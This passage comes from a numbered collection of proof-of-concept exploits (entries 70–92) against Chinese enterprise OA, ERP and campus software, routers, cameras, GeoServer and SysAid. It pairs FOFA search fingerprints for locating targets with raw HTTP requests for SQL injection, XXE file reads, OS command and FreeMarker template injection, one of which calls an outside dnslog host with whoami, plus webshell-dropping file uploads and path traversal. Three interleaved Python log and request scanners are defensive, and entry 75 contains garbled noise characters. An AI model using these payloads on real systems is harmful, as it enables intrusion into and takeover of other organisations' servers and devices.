FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu (万户) ezEIP success.aspx command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

The SID header is the command to run, base64-encoded: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk= decodes to type C:\Windows\win.ini. The __VIEWSTATE body is the (elided) payload.

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

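The SQL injection entries above (57, 58, 60, 64, 66, 68, 69, 71) leave a small set of fingerprints in the request line: WAITFOR DELAY, @@version, hashbytes/fn_varbintohexstr, UNION SELECT, and in entry 60 a base64-wrapped statement. The following detector is an added example for defenders, not code from the article or from any of the vendors; it assumes Apache/Nginx combined-format access logs, and the four log lines are constructed from the request lines of entries 57, 60 and 68 plus one benign request.

```python
"""Flag the SQL-injection probes listed above in web access logs (added example)."""
from __future__ import annotations

import base64
import binascii
import re
from urllib.parse import unquote_plus, urlsplit

# Indicators distilled from the PoCs for entries 57-71 (MSSQL and MySQL syntax).
SQLI_INDICATORS = {
    "time-based delay": re.compile(r"waitfor\s+delay\s*'\d", re.I),
    "@@version probe": re.compile(r"@@version", re.I),
    "md5 fingerprint": re.compile(r"hashbytes\s*\(\s*'md5'", re.I),
    "hex conversion": re.compile(r"fn_(?:varbintohexstr|sqlvarbasetostr)\s*\(", re.I),
    "union select": re.compile(r"union\s+(?:all\s+)?select\b", re.I),
    "mysql user() probe": re.compile(r"\buser\s*\(\s*\)", re.I),
}
_B64_RE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")
# Apache/Nginx combined log: client ident user [time] "METHOD target HTTP/x" status bytes
_LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r"(?P<status>\d{3}) (?P<bytes>\S+)"
)


def _pairs(encoded: str) -> list[tuple[str, str]]:
    """Split a query string on '&' and the first '=' only, without decoding, so that a ';'
    inside a value (entry 68) stays part of the value instead of starting a new pair."""
    pairs = []
    for chunk in encoded.split("&"):
        if chunk:
            name, _, value = chunk.partition("=")
            pairs.append((name, value))
    return pairs


def decode_layers(value: str, max_rounds: int = 3) -> list[str]:
    """Return the value followed by each decoded form of it: repeated percent-decoding,
    then one base64 layer when the text looks like base64 (entry 60 hides its SQL that way)."""
    forms = [value]
    for _ in range(max_rounds):
        decoded = unquote_plus(forms[-1])
        if decoded == forms[-1]:
            break
        forms.append(decoded)
    if _B64_RE.match(forms[-1]):
        try:
            text = base64.b64decode(forms[-1], validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            text = ""
        if text and text.isprintable():
            forms.append(text)
    return forms


def scan_target(target: str) -> list[dict]:
    """Check the path and every query parameter of a request target for SQLi indicators.
    One hit per (parameter, indicator); the most-decoded matching form is reported."""
    parts = urlsplit(target)
    candidates = [("<path>", parts.path)] + _pairs(parts.query)
    hits: dict[tuple[str, str], str] = {}
    for name, raw in candidates:
        for form in decode_layers(raw):
            for label, pattern in SQLI_INDICATORS.items():
                if pattern.search(form):
                    hits[(name, label)] = form
    return [{"param": n, "indicator": lbl, "decoded": f} for (n, lbl), f in hits.items()]


def scan_access_log(lines) -> list[dict]:
    """Run scan_target over combined-format log lines; lines that do not parse are skipped."""
    findings = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        hits = scan_target(m["target"])
        if hits:
            findings.append({"client": m["client"], "target": m["target"], "hits": hits})
    return findings


# Constructed sample: the request lines of entries 57, 60 and 68 as a server would log them,
# plus one benign request to the same keyEdit.aspx endpoint.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/May/2024:10:01:02 +0800] "GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1" 500 1843',
    '10.0.0.5 - - [12/May/2024:10:01:09 +0800] "GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1" 200 512',
    '10.0.0.7 - - [12/May/2024:10:02:30 +0800] "GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 77',
    '10.0.0.9 - - [12/May/2024:10:03:00 +0800] "GET /tplus/UFAQD/keyEdit.aspx?KeyID=1&preload=1 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding["client"], finding["target"])
        for hit in finding["hits"]:
            print("   ", hit["indicator"], "in", hit["param"], "->", hit["decoded"])
```

The base64 layer matters: a WAF rule on "select" never sees the statement in entry 60, and the decoded form is what you want in the alert. Run the script against real logs by feeding the file's lines to scan_access_log; the path is scanned as well as the query so a rewritten URL does not hide the parameter.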
72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

xmlValue decodes to a document whose DTD declares an external entity for file:///c:/windows/win.ini and expands it inside the VALUE field.

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-Server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

# n+ j% S6 Y2 z4 D4 y75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE* Y. T/ e2 [+ b( J
FOFA:app="TELESQUARE-TLR-2005KSH"+ ~1 m' ~% Q5 P% n! f- ^
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1+ S% t, U3 G0 N
Host: x.x.x.x
3 ^$ [; P* |8 \; MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 r) h7 _* R* M+ w% g5 z5 Y: n% sConnection: close
) H3 l C, {8 ], L+ G6 O& aAccept: */*
: ]: r1 z; U: o9 u. q2 DAccept-Language: en
+ ]1 s3 r8 R1 ~8 ^* G( RAccept-Encoding: gzip6 r; s3 o9 } G: a& d! W8 o* q
% t0 I! P9 X- L/ g% u2 H* J+ Z( d9 O& q. {2 N% I; f( F
GET /cgi-bin/test28256.txt HTTP/1.1+ }8 ], J7 H* r/ ]
Host: x.x.x.x( v6 n9 @0 s5 B8 P9 f: P
9 S, |3 M+ y: C; z, {$ `
76. Newcapec (新开普) campus service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

The UnitCode field is rendered as a FreeMarker template; the ?new() built-in instantiates freemarker.template.utility.Execute, which runs the string it is called with. Then fetch the marker:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

Then fetch the uploaded file (the target field chooses the directory under the web root):

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata (速达) Tianyao software DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

The report parameter names the output file, and the ../ moves it out of /report into the web root. Then fetch it:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

Note the custom Cmd header carrying the command; the JSON body is the elided payload.

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
"type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
Exploit request (drops a Godzilla webshell; accountId traverses from the upload directory into tomcat/webapps):
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Webshell URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

The %0a newlines end the ping command line and start a new one; ${IFS} stands in for the space that the host parameter filters.

87. DBAPPSecurity (安恒) MingYu (明御) security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

The suffix parameter carries the traversal; the uploaded content is then reachable at /jfhatuwe.php.

88. DBAPPSecurity (安恒) MingYu (明御) security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

The type parameter decodes to a shell line that appends <?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?> to /usr/local/webui/txzfsrur.php. Then request /txzfsrur.php: the marker string and phpinfo output confirm execution.

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

%70 decodes to p, so the request reaches editflow_manager.jsp while the literal URL does not end in .jsp; 111*222 evaluates to 24642 on the server, so look for that value in the response.

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

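The command-execution entries above (62, 70, 75, 76, 79, 82, 83, 84, 86, 88, 90, 92) share three habits: shell metacharacters or a newline in a parameter, a FreeMarker ?new() on freemarker.template.utility.Execute, and, in 70, 83 and 92, the command carried in a non-standard request header, sometimes base64-encoded. Most of them also redirect output into a marker file that the attacker fetches next. The scanner below is an added example for defenders, not code from the article or from any vendor; it assumes you have the request line, headers and body (for instance from a reverse proxy or WAF log), and the five sample requests are constructed from entries 62, 86, 84 and 70 plus one benign request.

```python
"""Spot the OS-command and FreeMarker template-injection probes listed above (added example)."""
from __future__ import annotations

import base64
import binascii
import json
import posixpath
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Strong indicators, from the parameter payloads of entries 62, 75, 76, 79, 82, 84, 86, 88.
STRONG_INDICATORS = {
    "shell metacharacter": re.compile(r"[|;`]|\$\("),
    "newline injection": re.compile(r"[\r\n]"),
    "IFS whitespace bypass": re.compile(r"\$\{IFS\}"),
    "freemarker execute": re.compile(r"freemarker\.template\.utility\.Execute|<#assign\b|\?new\(\)"),
}
# Command words are only suspicious in non-standard request headers (entries 70, 83, 92).
COMMAND_WORD = re.compile(r"\b(?:id|whoami|ifconfig|ipconfig|cat|type|echo|ping|curl)\b", re.I)
# Where a payload redirects its output: the marker file the attacker will fetch next.
MARKER_FILE = re.compile(r">>?\s*(\S+?\.(?:txt|php|jsp|aspx))")
STANDARD_HEADERS = frozenset((
    "host", "user-agent", "accept", "accept-encoding", "accept-language", "accept-charset",
    "connection", "content-type", "content-length", "cookie", "referer", "origin", "dnt",
    "x-requested-with", "upgrade-insecure-requests", "cache-control", "pragma",
))


def _b64_text(value: str) -> str:
    """Decode a base64 header value to ASCII text, or '' if it is not base64."""
    try:
        return base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return ""


def _body_values(body: str) -> list[tuple[str, str]]:
    """(name, value) pairs from a form or JSON body; anything else is one opaque value."""
    if not body:
        return []
    if body.lstrip().startswith(("{", "[")):
        try:
            doc = json.loads(body)
        except ValueError:
            return [("body", body)]
        pairs, queue = [], [("json", doc)]
        while queue:  # breadth-first walk so nested strings are all inspected
            name, node = queue.pop(0)
            if isinstance(node, dict):
                queue.extend((f"{name}.{k}", v) for k, v in node.items())
            elif isinstance(node, list):
                queue.extend((f"{name}[{i}]", v) for i, v in enumerate(node))
            elif isinstance(node, str):
                pairs.append((name, node))
        return pairs
    if "=" in body and not body.lstrip().startswith("<"):
        return parse_qsl(body, keep_blank_values=True)
    return [("body", body)]


def scan_request(target: str, headers: dict, body: str = "") -> list[dict]:
    """Return one finding per parameter with a strong indicator and per custom header
    that carries a command word, plainly or base64-encoded."""
    findings = []
    query = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    for name, raw in query + _body_values(body):
        value = unquote_plus(raw)  # second decode catches double-encoded payloads
        hits = [label for label, rx in STRONG_INDICATORS.items() if rx.search(value)]
        if hits:
            m = MARKER_FILE.search(value)
            findings.append({"where": f"param:{name}", "indicators": hits,
                             "drops": posixpath.basename(m.group(1)) if m else None})
    for name, value in headers.items():
        if name.lower() in STANDARD_HEADERS:
            continue
        for text in (value, _b64_text(value)):
            if text and COMMAND_WORD.search(text):
                findings.append({"where": f"header:{name}", "indicators": ["command word"], "decoded": text})
                break
    return findings


# Constructed samples (target, headers, body) replaying entries 62, 86, 84 and 70, then a benign request.
SAMPLE_REQUESTS = [
    ("/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true"
     "&page=||echo+%2209kdujzKJDLinkQTLfGzMMKDJ23HJ%22+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt",
     {"User-Agent": "Mozilla/5.0"}, ""),
    ("/cgi-bin/network_test.php", {"Content-Type": "application/x-www-form-urlencoded"},
     "host=%0acat${IFS}/etc/passwd%0a&command=ping"),
    ("/jeecg-boot/jmreport/queryFieldBySql", {"Content-Type": "application/json", "User-Agent": "curl/7.88.1"},
     json.dumps({"sql": '<#assign ex="freemarker.template.utility.Execute"?new()>'
                        '${ex("curl http://ip.port.kr9dqoau.dnslog.pw/`whoami")}', "type": "0"})),
    ("/member/success.aspx", {"SID": "dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=", "TYPE": "C", "User-Agent": "Mozilla/5.0"},
     "__VIEWSTATE=AAAA"),
    ("/cgi-bin/admin.cgi?Command=setSyncTimeHost&time=2024-05-01", {"User-Agent": "curl/7.88.1"}, ""),
]

if __name__ == "__main__":
    for target, headers, body in SAMPLE_REQUESTS:
        print(target, "->", scan_request(target, headers, body) or "clean")
```

The "drops" field is the operational part: when a finding names a marker file, a later GET for that name from the same client is the attacker confirming execution, and the file itself is what to look for on the host. User-Agent and the other standard headers are skipped on purpose, otherwise every curl client would trip the command-word rule.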
91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

The ..;/ segment is a Tomcat path parameter: a front-end filter matching on /center/api/task/ sees that prefix, while the servlet container strips the ;-suffix and resolves the request to /center/api/orgManage/v1/orgs/download. The fileName traversal then reads /etc/passwd.

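The file-read and upload entries above (61, 63, 67, 80, 85, 87, 91) all depend on a path that climbs out of its directory, either in a parameter (path, fileName, accountId, suffix, report, dir) or, in entry 91, in the URL itself through a ..;/ path parameter. The normaliser below is an added example for defenders, not code from the article or from Hikvision, IP-guard or any other vendor; it resolves requests the way a servlet container does and reports how far each value climbs. The five requests are constructed from entries 91, 63, 85 and 80 plus a benign download.

```python
"""Resolve request paths and parameters the way the target server will, to catch the
traversal tricks listed above before they reach the application (added example)."""
from __future__ import annotations

from urllib.parse import parse_qsl, unquote, urlsplit

# Files the PoCs above go after (entries 63, 70, 85, 91); extend for your own estate.
SENSITIVE_TARGETS = ("/etc/passwd", "win.ini", "config.ini", "/tomcat/webapps")


def percent_decode_fully(value: str, max_rounds: int = 3) -> str:
    """Undo repeated percent-encoding (..%2F, ..%252F) until the value stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def strip_path_params(path: str) -> str:
    """Drop Tomcat-style path parameters: the container sees '/..;/x' as '/../x'."""
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def walk(segments) -> tuple[list[str], int]:
    """Collapse '.' and '..' segments. Returns the remaining segments and the lowest depth
    reached; a negative depth means the path climbed above where it started."""
    out: list[str] = []
    depth = lowest = 0
    for seg in segments:
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            lowest = min(lowest, depth)
            if out:
                out.pop()
        else:
            depth += 1
            out.append(seg)
    return out, lowest


def analyze_target(target: str, body: str = "") -> list[dict]:
    """Findings for one request: a path whose resolved form differs from the requested one,
    and every query/form parameter whose value escapes its own directory."""
    findings = []
    parts = urlsplit(target)
    decoded_path = percent_decode_fully(parts.path)
    stripped = strip_path_params(decoded_path)
    if ".." in stripped.split("/"):
        segs, _ = walk(stripped.split("/"))
        findings.append({"kind": "path-parameter traversal", "requested": parts.path,
                         "resolved": "/" + "/".join(segs)})
    params = parse_qsl(parts.query, keep_blank_values=True)
    if body and "=" in body and not body.lstrip().startswith(("<", "{")):
        params += parse_qsl(body, keep_blank_values=True)
    for name, raw in params:
        value = percent_decode_fully(raw).replace("\\", "/")
        _, lowest = walk(value.split("/"))
        if lowest < 0:
            hit = next((t for t in SENSITIVE_TARGETS if t in value), None)
            findings.append({"kind": "parameter traversal", "param": name,
                             "climbs": -lowest, "sensitive": hit})
    return findings


# Constructed samples (target, body) replaying entries 91, 63, 85 and 80, then a benign download.
SAMPLE_REQUESTS = [
    ("/center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd", ""),
    ("/ipg/appr/MApplyList/downloadFile_client/getdatarecord",
     "path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1"),
    ("/userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_", ""),
    ("/report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp", ""),
    ("/center/api/orgManage/v1/orgs/download?fileName=report.pdf", ""),
]

if __name__ == "__main__":
    for target, body in SAMPLE_REQUESTS:
        print(target, "->", analyze_target(target, body) or "clean")
```

The "resolved" path is what to compare against your access-control rules: if the rule says /center/api/task/* is unauthenticated but the resolved path is under /center/api/orgManage/, the ..;/ has walked around the rule. Applying the same normalisation in a WAF or reverse proxy before matching rules is the fix on the infrastructure side; the vendor patch is still needed on the application side.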
92. Hikvision (海康威视) operations management center session command execution
Fastjson deserialization leading to command execution
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host: X
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
